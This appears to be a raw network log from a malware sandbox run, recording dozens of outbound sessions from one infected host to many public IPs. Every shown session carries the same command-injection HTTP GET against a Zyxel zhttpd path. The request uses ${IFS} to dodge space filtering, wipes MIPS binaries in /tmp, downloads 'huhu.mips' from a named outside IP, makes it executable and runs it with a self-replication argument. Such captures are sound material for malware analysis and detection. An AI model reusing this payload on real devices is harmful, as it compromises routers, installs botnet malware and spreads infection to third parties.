                                                      Feb 2, 2024 06:36:00.799696922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6399192.168.2.1458878123.47.120.52443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.799736023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6400192.168.2.1445038186.226.123.82443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.799774885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6401192.168.2.1448620192.97.177.102443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.799824953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6402192.168.2.1447546179.210.174.69443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.799859047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6403192.168.2.145965631.200.39.21443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.799899101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6404192.168.2.143368678.41.119.226443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.799932957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6405192.168.2.1438886156.191.28.203443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.799967051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6406192.168.2.143377689.224.215.9443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.800008059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6407192.168.2.143455684.84.253.128443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.800035000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6408192.168.2.1434558221.122.191.249443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.800084114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6409192.168.2.143987823.121.94.16443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.800101042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6410192.168.2.145082835.126.139.126443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.800136089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6411192.168.2.1433480109.8.229.215443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.800183058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6412192.168.2.1460260180.24.103.77443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.800218105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6413192.168.2.1457496167.165.50.144443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.800257921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6414192.168.2.145662496.238.41.232443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.800291061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6415192.168.2.143651244.105.253.83443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.800316095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6416192.168.2.1451000112.24.135.67443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.800362110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6417192.168.2.145254263.254.36.100443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.800395012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6418192.168.2.1457352124.189.87.237443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.800441027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6419192.168.2.1441698180.49.179.48443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.800482988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6420192.168.2.145144624.209.209.6443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.800514936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6421192.168.2.1460696211.131.120.181443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.800549984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6422192.168.2.144637488.73.224.169443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.800592899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6423192.168.2.1434550189.74.213.99443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.800627947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6424192.168.2.1448818188.223.114.27443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.800673008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6425192.168.2.1458380107.42.21.146443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.800719023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6426192.168.2.14448205.121.198.8443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.800745964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6427192.168.2.143430435.193.91.68443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.800786018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6428192.168.2.143283046.237.253.66443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.800796986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6429192.168.2.1438578174.5.75.49443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.800858974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6430192.168.2.144524453.44.221.27443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.800906897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6431192.168.2.1433786193.104.142.126443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.800966024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6432192.168.2.144932687.52.218.239443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.800990105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6433192.168.2.1453014117.138.134.3443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.801034927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6434192.168.2.1440352221.224.74.10443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.801074982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6435192.168.2.1433742172.231.179.48443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.801104069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6436192.168.2.145534068.40.24.93443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.801157951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6437192.168.2.1447890187.42.33.35443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.801186085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6438192.168.2.1455420143.123.38.18443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.801234007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6439192.168.2.1456936170.107.56.29443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.801280975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6440192.168.2.145947092.66.32.98443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.801337004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6441192.168.2.143627239.129.27.222443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.801383972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6442192.168.2.145158879.141.131.205443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.801423073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6443192.168.2.1458696216.183.120.155443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.814042091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6444192.168.2.145945020.194.176.86443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.814084053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6445192.168.2.145980627.183.234.46443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.814122915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6446192.168.2.145894014.172.167.193443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.814177990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6447192.168.2.145587424.30.232.66443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.814218998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6448192.168.2.145193038.182.218.233443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.814259052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6449192.168.2.1454416204.16.191.175443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.814297915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6450192.168.2.143408248.194.32.4443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.814342022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6451192.168.2.1432826205.113.186.58443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.814368963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6452192.168.2.144995658.43.190.244443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.814415932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6453192.168.2.144252642.163.251.226443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.814446926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6454192.168.2.1439716197.114.247.49443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.814491987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6455192.168.2.145626084.215.181.187443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.814546108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6456192.168.2.1447904117.182.180.121443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.814578056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6457192.168.2.1432900107.151.27.187443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.814593077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6458192.168.2.1437806221.249.27.108443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.814644098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6459192.168.2.1442774185.117.208.191443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.814683914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6460192.168.2.144383836.68.169.198443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.814722061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6461192.168.2.1460688115.4.245.59443
                                                      TimestampBytes transferredDirectionData
